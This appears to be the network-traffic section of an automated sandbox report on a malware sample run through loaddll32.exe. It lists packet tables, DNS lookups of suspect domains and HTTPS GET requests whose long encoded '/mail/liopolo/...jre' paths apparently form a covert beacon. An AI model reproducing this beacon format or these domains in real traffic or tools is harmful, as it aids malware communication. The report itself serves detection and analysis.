                                                                                                                                Oct 12, 2021 00:50:46.929090977 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.932966948 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.933007002 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.978180885 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.019146919 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.091273069 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.091360092 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.103151083 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.108998060 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109036922 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109047890 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109065056 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.109095097 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:47.109102011 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:59.905160904 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:59.905235052 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:59.905407906 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:59.916407108 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:59.916452885 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.122654915 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.122772932 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.126184940 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.126225948 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.126672029 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.331165075 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.331262112 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.620603085 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.663161039 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.739191055 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.739284992 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.739386082 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.741317987 CEST49766443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:51:00.741343021 CEST4434976613.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:27.829962969 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:27.830005884 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:27.831302881 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:27.831747055 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:27.831760883 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.345242977 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.345370054 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.350394011 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.350404978 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.350694895 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.353148937 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.395128012 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.521780968 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.521857977 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.521950960 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.522217035 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.522236109 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.522434950 CEST49779443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:28.522449970 CEST4434977940.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.552305937 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.552341938 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.553409100 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.554908991 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.554927111 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.659035921 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.659148932 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.663799047 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.663817883 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.664269924 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.668565989 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.698314905 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.698421001 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.698537111 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.698973894 CEST49782443192.168.2.352.98.207.210
                                                                                                                                Oct 12, 2021 00:51:28.698997974 CEST4434978252.98.207.210192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.726995945 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.727035046 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.727166891 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.728127003 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.728147984 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.835772038 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.836008072 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.839567900 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.839591026 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.839824915 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.842505932 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.883135080 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.896899939 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897229910 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897412062 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897692919 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897708893 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.897897959 CEST49783443192.168.2.340.101.60.226
                                                                                                                                Oct 12, 2021 00:51:28.897907972 CEST4434978340.101.60.226192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.616982937 CEST49816443192.168.2.340.97.161.50
                                                                                                                                Oct 12, 2021 00:51:42.617027998 CEST4434981640.97.161.50192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.617142916 CEST49816443192.168.2.340.97.161.50

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 12, 2021 00:50:46.328675985 CEST4957253192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:50:46.346757889 CEST53495728.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:47.112384081 CEST6082353192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:50:59.810003996 CEST4955953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:50:59.828058004 CEST53495598.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:00.767441988 CEST5265053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:07.697834969 CEST5361553192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:07.716279984 CEST53536158.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:22.258112907 CEST5710653192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:22.279072046 CEST53571068.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:27.808382034 CEST6098253192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST53609828.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.527216911 CEST6436753192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST53643678.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:28.705688000 CEST5153953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST53515398.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:42.597249031 CEST6349053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST53634908.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.307075024 CEST6511053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST53651108.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:43.469110966 CEST6112053192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST53611208.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:51:49.150876999 CEST5307953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:51:49.169133902 CEST53530798.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:52:04.028712988 CEST5356953192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:52:04.047215939 CEST53535698.8.8.8192.168.2.3
                                                                                                                                Oct 12, 2021 00:52:09.192166090 CEST6285553192.168.2.38.8.8.8
                                                                                                                                Oct 12, 2021 00:52:09.213083982 CEST53628558.8.8.8192.168.2.3

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                Oct 12, 2021 00:50:46.328675985 CEST192.168.2.38.8.8.80xe703Standard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:47.112384081 CEST192.168.2.38.8.8.80xc12dStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:59.810003996 CEST192.168.2.38.8.8.80xabaStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:00.767441988 CEST192.168.2.38.8.8.80x1d9cStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:07.697834969 CEST192.168.2.38.8.8.80xf9f2Standard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:22.258112907 CEST192.168.2.38.8.8.80x27cbStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.808382034 CEST192.168.2.38.8.8.80x171fStandard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.527216911 CEST192.168.2.38.8.8.80x2f20Standard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.705688000 CEST192.168.2.38.8.8.80x6abeStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.597249031 CEST192.168.2.38.8.8.80xe44aStandard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.307075024 CEST192.168.2.38.8.8.80xcd71Standard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.469110966 CEST192.168.2.38.8.8.80x8ed1Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:49.150876999 CEST192.168.2.38.8.8.80xc5f5Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:04.028712988 CEST192.168.2.38.8.8.80x6b6fStandard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:09.192166090 CEST192.168.2.38.8.8.80x2e04Standard query (0)msn.comA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                Oct 12, 2021 00:50:46.346757889 CEST8.8.8.8192.168.2.30xe703No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:47.130182028 CEST8.8.8.8192.168.2.30xc12dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:56.123812914 CEST8.8.8.8192.168.2.30x703eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:50:59.828058004 CEST8.8.8.8192.168.2.30xabaNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:00.784550905 CEST8.8.8.8192.168.2.30x1d9cNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:07.716279984 CEST8.8.8.8192.168.2.30xf9f2Name error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:22.279072046 CEST8.8.8.8192.168.2.30x27cbName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:27.828670979 CEST8.8.8.8192.168.2.30x171fNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.98.207.210A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.97.220.18A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.97.147.178A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.549596071 CEST8.8.8.8192.168.2.30x2f20No error (0)HHN-efz.ms-acdc.office.com52.97.212.194A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com52.97.151.50A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com52.97.149.242A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:28.724781990 CEST8.8.8.8192.168.2.30x6abeNo error (0)HHN-efz.ms-acdc.office.com52.97.151.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:42.614928007 CEST8.8.8.8192.168.2.30xe44aNo error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.98.207.210A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.97.151.18A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.97.151.66A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.124.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com52.98.171.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.62.34A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:49.169133902 CEST8.8.8.8192.168.2.30xc5f5Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:04.047215939 CEST8.8.8.8192.168.2.30x6b6fName error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:09.213083982 CEST8.8.8.8192.168.2.30x2e04No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • msn.com
                                                                                                                                • outlook.com
                                                                                                                                • www.outlook.com
                                                                                                                                • outlook.office365.com

                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                0192.168.2.34975913.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:50:46 UTC0OUTGET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: msn.com
                                                                                                                                2021-10-11 22:50:47 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Location: https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre
                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Date: Mon, 11 Oct 2021 22:50:46 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 379
                                                                                                                                2021-10-11 22:50:47 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 56 6e 34 4a 76 6f 46 49 64 36 43 70 33 4e 4c 59 5a 2f 75 6b 66 43 57 57 63 78 63 68 50 6a 2f 71 43 55 63 41 37 67 34 70 38 6f 2f 49 7a 71 47 47 6e 67 5a 78 34 39 64 6b 54 2f 5f 32 46 63 33 73 45 42 42 58 76 41 45 59 6b 50 67 65 47 41 5f 2f 32 42 79 39 50 70 52 6f 4c 67 66 76 65 5f 32 46 2f 76 68 66 64 54 37 48 43 56 35 30 36 41 77 42 2f 33 36 6d
                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36m


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                1192.168.2.34976613.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:00 UTC1OUTGET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: msn.com
                                                                                                                                2021-10-11 22:51:00 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Location: https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre
                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Date: Mon, 11 Oct 2021 22:50:59 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 373
